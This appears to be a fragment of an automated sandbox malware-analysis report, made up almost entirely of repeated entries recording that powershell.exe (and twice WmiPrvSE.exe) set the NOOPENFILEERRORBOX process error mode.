                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
